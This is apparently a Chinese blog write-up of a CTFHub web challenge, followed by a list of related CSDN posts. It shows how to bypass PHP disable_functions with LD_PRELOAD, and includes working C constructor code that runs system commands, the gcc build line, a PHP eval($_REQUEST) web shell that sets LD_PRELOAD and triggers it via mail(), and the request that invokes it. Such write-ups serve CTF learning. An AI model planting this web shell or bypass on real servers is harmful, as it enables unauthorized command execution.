ctf web方向与php学习记录27

最新推荐文章于 2023-07-03 17:23:28 发布
最新推荐文章于 2023-07-03 17:23:28 发布
阅读量808 收藏 1
点赞数 2
分类专栏: SSRF bypass 文章标签: linux c++ c语言 c#
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46203060/article/details/109752328
版权

针对一道ctfhub上的LD_PRELOAD,我进行了为期三天的学习和总结,以下是总结和收集的资料,由于是在onenote上作的笔记,就不在花功夫对文字进行编辑了,大家自行阅览,希望能对你起到帮助。
在这里插入图片描述
在这里插入图片描述在这里插入图片描述接下来我给出的wp。
一,蚁剑连接
在这里插入图片描述二,创建hack.c并转共享hack.so
hack.c代码

#include <stdio.h>
#include <unistd.h>
#include <stdio.h>

__attribute__ ((__constructor__)) void angel (void){
    unsetenv("LD_PRELOAD");
    system("/readflag > /tmp/sunian");
}

利用gcc进行编译。
gcc -shared -fPIC hack.c -o hack.so

在这里插入图片描述
三,设置环境变量
sunian.php源码

<?php
  @eval($_REQUEST['ant']);
  putenv("LD_PRELOAD=/tmp/hack.so");
  error_log("admin",1);
  mail("admin@localhost","","","","");
?>

并将hack.so放入/tmp目录下。
在这里插入图片描述将sunian.php直接拖入蚁剑的html目录下。
在这里插入图片描述这里要注意‘,’的问题。
在这里插入图片描述
四,利用playload运行连接动态连接库的sunian.php
GET请求包含sunian.php

url/?ant=include(%27sunian.php%27);

http://challenge-3d1303d54c4a9b70.sandbox.ctfhub.com:10080/?ant=include(%27sunian.php%27);
根据源码,flag就在生成的sunian文件中。
在这里插入图片描述在这里插入图片描述最后,这道题涉及的知识一定不仅仅只有本文所述内容,还请各位CTFer,多多指正。

这周末在做梦
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CTF Web学习笔记
01-11
CTF Web学习笔记,包含杂项和WEB两部分,包含杂项简介,WEB知识点总结以及Web常用套路总结。
PHP代码注入】PHP代码注入漏洞
cc
03-06 6128
call_user_func()等函数都有调用其他函数的功能,其中的一个参数作为要调用的函数名,那如果这个传入的函数名可控,那就可以调用意外的函数来执行我们想要的代码,也就是存在任意代码执行漏洞。以call_user_func($fun,$para)函数为例,该函数的第一个参数作为回调函数,后面的参数为回调函数的参数,将$para这个参数传递给$fun这个函数去执行。我们可以利用file_get_contents()函数,写入文件,该函数的作用在于将第二个参数作为内容写入到第一个参数的文件中。
CTF第十四天
qq_52680097的博客
08-28 904
CTF第十四天 太久没写了,今天挑战下题目 LD_PRELOAD 太久没整了,我都忘了PHP是啥,再复习一遍。 PHP是一种能在服务器端执行的脚本语言,也可嵌入到HTML中 看到这个提示,先来了解下Linux LD_PRELOAD环境变量 这里有关于动态链接库的详解和Linux LD_PRELOAD环境变量简介 动态链接库详解【一】 linux 环境变量LD_PRELOAD简介 定义优先加载的动态链接库 了解了这些,大概就能知道这题的原理了 原理:php部分函数在执行的时候会加载动态库里面的函数,而LD_
CTFHub技能树 Web进阶详解
weixin_45808483的博客
12-02 2201
PHP Bypass disable_function PHP 的 disabled_functions主要是用于禁用一些危险的函数防止被一些攻击者利用 有四种绕过 disable_functions 的手法: 攻击后端组件,寻找存在命令注入的 web 应用常用的后端组件,如,ImageMagick 的魔图漏洞、bash 的破壳漏洞等等 寻找未禁用的漏网函数,常见的执行命令的函数有 system()、exec()、shell_exec()、passthru(),偏僻的popen()、proc_open
CTF-命令执行
Luodehahajiang的博客
07-03 1767
ctf 命令执行 命令执行函数 命令执行绕过方法
PHP代码注入】PHP语言常见可注入函数以及PHP代码注入漏洞的利用实例
m0_64378913的博客
06-26 7028
目录1 PHP注入概述2 相关函数与语言结构2.1 eval()函数2.2 assert()函数2.3 preg_replace()函数2.4 call_user_func()函数2.5 动态函数`$a($b)`3 总结 1 PHP注入概述 RCE概念:remote command/code execute,远程命令/代码执行。 PHP代码执行:在WEB中,PHP代码执行是指应用程序过滤不严,用户可用通过请求将代码注入到应用中执行。 PHP代码注入与SQL注入比较: 其注入思想是类似的,均是构造语句绕过服务
CTF-Web-Challenge:使用PHPWeb中进行CTF挑战
03-25
在这个"CTF-Web-Challenge"中,你将有机会学习和实践如何在Web环境中识别和利用漏洞。 PHP是一种广泛使用的服务器端脚本语言,特别适合开发动态网站。在CTF挑战中,你可能会遇到的PHP相关知识点包括: 1. **PHP...
ctf web培训资料pdf
10-06
通过url访问靶机web站点,观察页面中的功能点,对可能存在漏洞的页面进行探测。 常见的漏洞特征: SQL注入:www.example.com?id=1 文件包含:www.example.com?page=file1.php 文件上传
ctfhub web全部做题记录(持续跟新)
01-08
CTF(Capture The Flag)】CTF是一种网络安全竞赛,其中参赛者通过解决各种安全问题来获取“旗标”(代表分数),这些问题通常涉及逆向工程、密码学、Web安全、取证分析等多个领域。 【Web安全】Web安全是网络...
CTF-web学习大纲
最新发布
01-30
CTF-web学习大纲
php反向代理ctf,刷题记录:[SUCTF 2019]EasyWeb(EasyPHP)
weixin_39946657的博客
03-11 301
[TOC]刷题记录:[SUCTF 2019]EasyWeb(EasyPHP)一、涉及知识点1、无数字字母shell这个方面充满了奇技淫巧,看的我一愣一愣,先说利用的php特性:(1)代码中没有引号的字符都自动作为字符串Php的经典特性“Use of undefined constant”,会将代码中没有引号的字符都自动作为字符串,7.2开始提出要被废弃,不过目前还存在着。我猜这也是为什么传马的时候...
php代码执行函数解析
xujunhui222的博客
02-11 3425
** php代码执行函数解析 ** ​一、代码执行漏洞原理: 用户输入的数据被当做后端代码进行执行 <?php @eval($_REQUEST[8])?>//其实一句话木马的本质就是一个代码执行漏洞。用户输入的数据被当做代码进行执行。 这里提一下RCE(remote command/code execute)远程命令或者代码执行。现在只要渗透的最终情况可以实现执行命令或者是代码都属于RCE,例如代码执行、文件包含、反序列化、命令执行,甚至是写文件Getshell都可以属于RCE 在PHP存在诸多
CTF/CTF练习平台-本地包含【eval函数闭合及代码段的理解】
热门推荐
Sp4rkW的博客
08-21 4万+
原题内容: 地址:http://120.24.86.145:8003/ 怎么说呢,难其实也不难,还是基本知识点掌握不足吧,写个wp记录下自己学习到的知识点 &lt;?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(_...
CTFPHP
Greedy Hat的博客
09-14 753
文章目录PHP超级全局变量$GLOBALS$_SERVER$_REQUEST$_POST$_GET$_FILESPHP内建函数PHP魔术常量_ LINE __ FILE __ DIR __ FUNCTION __ CLASS __ TRAIT ___ METHOD____ NAMESPACE__PHP表单和用户输入PHP表单处理PHP获取下拉菜单的数据PHP下拉菜单单选PHP下拉菜单多选单选按钮表...
动态加载器的知识学习CTFHUB动态加载器解题
hapenl的博客
10-21 1378
本文介绍了Linux动态库加载器的基本知识,介绍了ELF文件的查看指令以及执行文件的执行链路的查看,最后通过可执行的动态加载库来绕过没有执行权限的执行文件
eval代码执行漏洞
ChenZIDu的博客
09-22 5783
eval() 函数把字符串按照 PHP 代码来计算。 该字符串必须是合法的 PHP 代码,且必须以分号结尾。 如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false。 看一则样例 <?php include "flag.php"; $a = @$_REQUEST['hello']; eva...
CTFHub之web进阶学习
bmth666的博客
01-13 1956
文章目录PHPBypass disable_functionLD_PRELOADShellShock(未完成)Apache Mod CGI(未完成) PHP Bypass disable_function PHP 的 disabled_functions主要是用于禁用一些危险的函数防止被一些攻击者利用 有四种绕过 disable_functions 的手法: 攻击后端组件,寻找存在命令注入的 w...
CTFHUB技能树(全详细解析含进阶)
hxhxhxhxx的博客
01-17 3万+
HTTP协议 请求树 根据提示直接修改头即可 302跳转 直接重放获得302跳转, Cookie 字面意思, 基础认证 简介: 在HTTP中,基本认证(英语:Basic access authentication)是允许http用户代理(如:网页浏览器)在请求时,提供 用户名 和 密码 的一种方式。详情请查看 https://zh.wikipedia.org/wiki/HTTP基本认证 附件提供了密码,很明显就是爆破 有了用户名,而且发现一个base加密的东西 解密看看 固定格式啊,
php eval函数用法----PHP中eval()函数小技巧
也想快乐的生活
06-24 1万+
php eval函数用法----PHP中eval()函数小技巧eval将值代入字符串之中。语法: void eval(string code_str);传回值: 无函式种类: 数据处理内容说明本函式可将字符串之中的变量值代入,通常用在处理数据库的数据上。参数 code_str 为欲处理的字符串。值得注意的是待处理的字符串要符合 PHP 的字符串格式,同时
ctf web方向怎么学习
04-27
如果你想学习CTF Web方向,建议你掌握一些基本的技能,如Web开发和网络安全知识。可以从以下几个方面入手学习: 1. 学习Web开发:HTML、CSS、JavaScript、PHP、ASP.NET等等。 2. 学习网络知识:如HTTP协议、TCP/IP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

这周末在做梦

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值